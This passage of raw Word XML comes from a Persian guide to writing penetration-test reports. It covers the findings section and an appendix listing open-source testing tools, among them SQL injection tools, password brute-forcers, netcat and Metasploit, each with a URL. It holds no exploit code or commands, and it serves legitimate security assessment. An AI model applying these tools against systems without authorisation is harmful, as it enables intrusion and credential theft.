          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>هشداری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مانند دسترس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به س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و غ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ره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باشد. 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بخش همچن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مقدمه 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بر رت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به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بند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1732B1">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>خطرکه در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طول گزارش</w:t>
      </w:r>
      <w:r w:rsidR="001732B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1732B1" w:rsidRPr="001C0920">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>استفاده شده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و سپس خلاصه فن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افته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="001732B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باشد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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197BC096" w14:textId="77777777" w:rsidR="00B42118" w:rsidRDefault="00B42118" w:rsidP="00B42118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3B98019A" w14:textId="77777777" w:rsidR="00B42118" w:rsidRPr="00235FC4" w:rsidRDefault="00235FC4" w:rsidP="00235FC4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235FC4">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>III</w:t>
      </w:r>
      <w:r w:rsidRPr="00235FC4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. ی</w:t>
      </w:r>
      <w:r w:rsidRPr="00235FC4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افته</w:t>
      </w:r>
      <w:r w:rsidRPr="00235FC4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ها</w:t>
      </w:r>
      <w:r w:rsidRPr="00235FC4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ارز</w:t>
      </w:r>
      <w:r w:rsidRPr="00235FC4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اب</w:t>
      </w:r>
      <w:r w:rsidRPr="00235FC4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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518232E2" w14:textId="77777777" w:rsidR="00B42118" w:rsidRDefault="00235FC4" w:rsidP="00E930A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بخش آخر گزارش، بخش </w:t>
      </w:r>
      <w:r w:rsidR="00E930AA">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>یافته های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شامل جزئ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دق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ق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در مورد آس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پذ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موجود و رو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مورد ن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اطم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نان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از حل آنها است.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE6DBF3" w14:textId="77777777" w:rsidR="009355EA" w:rsidRDefault="00E930AA" w:rsidP="004A544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E930AA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بخش در سطح فن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مورد هدف قرار م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 w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>رد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و با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تمام اطلاعات لازم برا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ت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فراهم </w:t>
      </w:r>
      <w:r w:rsidR="004A5447">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>شود که آنها مسئله را درک کنند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و قادر به حل </w:t>
      </w:r>
      <w:r w:rsidR="004A5447">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>آن</w:t>
      </w:r>
      <w:r w:rsidR="004A5447"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>باش</w:t>
      </w:r>
      <w:r w:rsidR="004A5447">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>ن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>د.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5590B691" w14:textId="77777777" w:rsidR="009355EA" w:rsidRPr="004A5447" w:rsidRDefault="004A5447" w:rsidP="004A544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بخش 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افته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ها با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شامل موارد ز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باشد:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB8C8D8" w14:textId="77777777" w:rsidR="009355EA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یک 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>شماره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ی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مرجع برا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رجوع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آسان با تصاو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</w:p>
    <w:p w14:paraId="6AFDDD15" w14:textId="77777777" w:rsidR="009355EA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عامل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آس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د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</w:p>
    <w:p w14:paraId="28176DEF" w14:textId="77777777" w:rsidR="009355EA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توص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ف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از موضوع</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E134AE" w14:textId="77777777" w:rsidR="004A5447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5447">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>بخش حل و فصل مسئله</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAEBC4B" w14:textId="77777777" w:rsidR="009355EA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5447">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>رتبه ر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و ارزش تاث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</w:p>
    <w:p w14:paraId="097A7539" w14:textId="77777777" w:rsidR="009355EA" w:rsidRDefault="00B846B1" w:rsidP="00B846B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هر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یافته ای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با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واضح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و مختصر باشد و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باید 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خواننده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 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گزارش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درک کامل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از مسئله در دست داشته باشد. صفحات بعد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گزارش جدول را نشان م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دهند.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EFB55E" w14:textId="77777777" w:rsidR="009355EA" w:rsidRDefault="00BC187D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 w14:anchorId="62220904">
          <v:shape id="_x0000_i1028" type="#_x0000_t75" style="width:467.7pt;height:437pt">
            <v:imagedata r:id="rId11" o:title="5_333"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0DB0B0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74402C19" w14:textId="77777777" w:rsidR="009355EA" w:rsidRDefault="00BC187D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 w14:anchorId="4EC0D510">
          <v:shape id="_x0000_i1029" type="#_x0000_t75" style="width:467.35pt;height:571.95pt">
            <v:imagedata r:id="rId12" o:title="6_334"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE8A4F4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40D17CE" w14:textId="77777777" w:rsidR="009355EA" w:rsidRDefault="00BC187D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 w14:anchorId="56BAB541">
          <v:shape id="_x0000_i1030" type="#_x0000_t75" style="width:467.35pt;height:564.75pt">
            <v:imagedata r:id="rId13" o:title="7_335"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="65571AA4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59A5F97E" w14:textId="77777777" w:rsidR="009355EA" w:rsidRDefault="00BC187D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 w14:anchorId="53C874C6">
          <v:shape id="_x0000_i1031" type="#_x0000_t75" style="width:467.35pt;height:184.4pt">
            <v:imagedata r:id="rId14" o:title="8_336"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F613089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5E8FE8D6" w14:textId="77777777" w:rsidR="009355EA" w:rsidRDefault="00BC187D" w:rsidP="00BC187D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BC187D">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>IV</w:t>
      </w:r>
      <w:r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.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC187D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جعبه ابزار </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E43740" w14:textId="77777777" w:rsidR="00BC187D" w:rsidRDefault="00BC187D" w:rsidP="000062B9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BC187D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بخش اغلب برا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توص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ف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ابزار تجار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و متن باز که در </w:t>
      </w:r>
      <w:r w:rsidR="002773C8">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>اداره کردن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مورد استفاده قرار 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رد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استفاده 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شود. هنگام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که اسکر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پت</w:t>
      </w:r>
      <w:r w:rsidR="002773C8" w:rsidRPr="00BC187D">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>/ کد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سفارش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در ح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مورد استفاده قرار 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رند،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در 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بخش </w:t>
      </w:r>
      <w:r w:rsidR="006571BB">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>مشخص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شود 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به عنوان ضم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مه</w:t>
      </w:r>
      <w:r w:rsidR="000062B9">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> ذکر ش</w:t>
      </w:r>
      <w:r w:rsidR="000062B9">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>ود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>.</w:t>
      </w:r>
      <w:r w:rsidR="000062B9">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>مشتریان استقبال می نمایند وقتی مشاوران متودولوژی استفاده شده را هم اضافه کرده باشند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>. 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به آنها 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 w:rsidR="000062B9">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>سختی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و همچن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که در آن </w:t>
      </w:r>
      <w:r w:rsidR="000062B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چه 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>مناطق</w:t>
      </w:r>
      <w:r w:rsidR="000062B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گنجانده شده است</w:t>
      </w:r>
      <w:r w:rsidR="000062B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می دهد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14:paraId="3B288677" w14:textId="77777777"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1CBB5282" w14:textId="77777777" w:rsidR="00BC187D" w:rsidRPr="000062B9" w:rsidRDefault="000062B9" w:rsidP="001E0199">
      <w:pPr>
        <w:bidi/>
        <w:jc w:val="center"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082506">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>پ</w:t>
      </w:r>
      <w:r w:rsidRPr="00082506">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>ی</w:t>
      </w:r>
      <w:r w:rsidRPr="00082506">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>وست</w:t>
      </w:r>
      <w:r w:rsidRPr="00082506">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00082506">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00082506">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00082506">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00082506">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> ابزارها</w:t>
      </w:r>
      <w:r w:rsidRPr="00082506">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>ی</w:t>
      </w:r>
      <w:r w:rsidRPr="00082506">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> تست</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5958FF72" w14:textId="77777777" w:rsidR="00BC187D" w:rsidRDefault="000062B9" w:rsidP="000062B9">
      <w:pPr>
        <w:bidi/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000062B9">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>OPEN SOURCE BLACK BOX TESTING TOOLS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464C976C" w14:textId="77777777" w:rsidR="00BC187D" w:rsidRPr="001E0199" w:rsidRDefault="000062B9" w:rsidP="000062B9">
      <w:pPr>
        <w:bidi/>
        <w:jc w:val="center"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1E0199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تست عموم</w:t>
      </w:r>
      <w:r w:rsidRPr="001E0199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14:paraId="0359F05E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OWASP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WebScarab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2C66E95E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OWASP CAL9000: CAL9000 is a collection of browser-based tools that enable more effective and efficient manual testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03137CDD" w14:textId="77777777" w:rsidR="000062B9" w:rsidRPr="0068617C" w:rsidRDefault="000062B9" w:rsidP="001E0199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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0068617C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>efforts</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0068617C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>. Includes an XSS Attack Library, Character Encoder/Decoder, HTTP Request Generator and Response Evaluator, Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA9E93A" w14:textId="77777777" w:rsidR="000062B9" w:rsidRPr="0068617C" w:rsidRDefault="000062B9" w:rsidP="001E0199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Checklist, Automated Attack Editor and much more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A651FBB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OWASP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Pantera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Web Assessment Studio Project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347F0241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lastRenderedPageBreak/>
        <w:t>SPIKE - http://www.immunitysec.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07864FBC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Paros - http://www.parosproxy.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AD83C9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Burp Proxy - http://www.portswigger.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A5A178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Achilles Proxy - http://www.mavensecurity.com/achilles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32303E34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Odysseus Proxy - http://www.wastelands.gen.nz/odysseus/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCF20E9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Webstretch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Proxy - http://sourceforge.net/projects/webstretch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482E8A8C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Firefox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LiveHTTPHeaders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>, Tamper Data and Developer Tools - http://www.mozdev.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C85F919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Sensepost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Wikto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(Google cached fault-finding) - http://www.sensepost.com/research/wikto/index2.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB1FE8F" w14:textId="77777777" w:rsidR="00BC187D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Grendel-Scan - http://www.grendel-scan.com </w:t>
      </w:r>
      <w:r w:rsidRPr="0068617C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:cr/>
      </w:r>
    </w:p>
    <w:p w14:paraId="197FA2EC" w14:textId="77777777" w:rsidR="00BC187D" w:rsidRPr="0068617C" w:rsidRDefault="00BC187D" w:rsidP="00BC187D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14:paraId="5099EBA9" w14:textId="77777777" w:rsidR="00BC187D" w:rsidRPr="0068617C" w:rsidRDefault="001E0199" w:rsidP="001E0199">
      <w:pPr>
        <w:bidi/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts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68617C">
        <w:rPr>
          <w:rFonts w:cs="B Nazanin"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>تست برای آسیب پذیری های خاص</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF28783" w14:textId="77777777" w:rsidR="001E0199" w:rsidRPr="0068617C" w:rsidRDefault="001E0199" w:rsidP="001E0199">
      <w:pPr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Flash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6245939D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OWASP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SWFIntruder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- http://www.owasp.org/index.php/Category:SWFIntruder,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223CE4E0" w14:textId="77777777" w:rsidR="001E0199" w:rsidRPr="0068617C" w:rsidRDefault="001E0199" w:rsidP="001E0199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http://www.mindedsecurity.com/swfintruder.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15251C00" w14:textId="77777777" w:rsidR="001E0199" w:rsidRPr="0068617C" w:rsidRDefault="001E0199" w:rsidP="001E0199">
      <w:pPr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AJAX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAFEF6F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OWASP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Sprajax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Project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37816172" w14:textId="77777777" w:rsidR="001E0199" w:rsidRPr="0068617C" w:rsidRDefault="001E0199" w:rsidP="001E0199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for SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7984305F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OWASP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SQLiX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5F40A42C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Multiple DBMS SQL Injection tool - SQL Power Injector</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE708F8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MySQL Blind Injection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Bruteforcing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>, Reversing.org - [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sqlbftools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>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334FFBE5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Antonio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Parata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: Dump Files by SQL inference on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Mysql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- [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SqlDumper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>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7F45F4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Sqlninja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>: a SQL Server Injection &amp; Takeover Tool - http://sqlninja.sourceforge.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AB593E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Bernardo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Damele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and Daniele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Bellucci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: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sqlmap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>, a blind SQL injection tool - http://sqlmap.sourceforge.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8B4A75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Absinthe 1.1 (formerly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SQLSqueal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>) - http://www.0x90.org/releases/absinthe/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB4476B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SQLInjector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- http://www.databasesecurity.com/sql-injector.htm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58249056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lastRenderedPageBreak/>
        <w:t>bsqlbf-1.2-th - http://www.514.es</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC2237D" w14:textId="77777777" w:rsidR="001E0199" w:rsidRPr="0068617C" w:rsidRDefault="001E0199" w:rsidP="001E0199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Oracle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD829A1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TNS Listener tool (Perl) - http://www.jammed.com/%7Ejwa/hacks/security/tnscmd/tnscmd-doc.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC200AB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Toad for Oracle - http://www.quest.com/toad </w:t>
      </w:r>
      <w:r w:rsidRPr="0068617C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:cr/>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A091A3" w14:textId="77777777" w:rsidR="001E0199" w:rsidRPr="0068617C" w:rsidRDefault="001E0199" w:rsidP="001E0199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SSL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FFFB2C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Foundstone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SSL Digger - http://www.foundstone.com/resources/proddesc/ssldigger.htm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6453A278" w14:textId="77777777" w:rsidR="00BC187D" w:rsidRPr="0068617C" w:rsidRDefault="001E0199" w:rsidP="001E0199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for Brute Force Password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778CCD7A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THC Hydra - http://www.thc.org/thc-hydra/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB3B322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John the Ripper - http://www.openwall.com/john/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEC1C41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Brutus - http://www.hoobie.net/brutus/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C04E207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Medusa - http://www.foofus.net/~jmk/medusa/medusa.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325FD60C" w14:textId="77777777" w:rsidR="001E0199" w:rsidRPr="0068617C" w:rsidRDefault="001E0199" w:rsidP="001E0199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for HTTP Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A36A58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NetCat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- http://www.vulnwatch.org/netcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15337F99" w14:textId="77777777" w:rsidR="001E0199" w:rsidRPr="0068617C" w:rsidRDefault="001E0199" w:rsidP="001E0199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Buffer Overflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B2CAF3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OllyDbg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- http://www.ollydbg.de</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D20B939" w14:textId="77777777" w:rsidR="001E0199" w:rsidRPr="0068617C" w:rsidRDefault="001E0199" w:rsidP="001E0199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"A windows based debugger used for analyzing buffer overflow vulnerabilities"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6E9DBE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Spike - http://www.immunitysec.com/downloads/SPIKE2.9.tgz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA65A4A" w14:textId="77777777" w:rsidR="001E0199" w:rsidRPr="0068617C" w:rsidRDefault="001E0199" w:rsidP="001E0199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A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fuzzer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framework that can be used to explore vulnerabilities and perform length testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E2A1AD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Brute Force Binary Tester (BFB) - http://bfbtester.sourceforge.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6126B0" w14:textId="77777777" w:rsidR="001E0199" w:rsidRPr="0068617C" w:rsidRDefault="001E0199" w:rsidP="0068617C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A proactive binary checker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50161AA8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Metasploit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- http://www.metasploit.com/projects/Framework/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B098E5F" w14:textId="77777777" w:rsidR="001E0199" w:rsidRPr="0068617C" w:rsidRDefault="001E0199" w:rsidP="0068617C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A rapid exploit development and Testing frame work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A7CF91" w14:textId="77777777" w:rsidR="001E0199" w:rsidRPr="0068617C" w:rsidRDefault="001E0199" w:rsidP="0068617C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proofErr w:type="spellStart"/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Fuzzer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="18D2CDA9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WSFuzzer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6A289A05" w14:textId="77777777" w:rsidR="001E0199" w:rsidRPr="0068617C" w:rsidRDefault="001E0199" w:rsidP="0068617C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Googling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A9928D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rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pP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Foundstone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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0068617C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>Sitedigger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 (Google cached fault-finding) - http://www.foundstone.com/resources/proddesc/sitedigger.htm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E67F1CE" w14:textId="77777777"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4B449B8" w14:textId="77777777" w:rsidR="00BC187D" w:rsidRPr="0068617C" w:rsidRDefault="0068617C" w:rsidP="0068617C">
      <w:pPr>
        <w:bidi/>
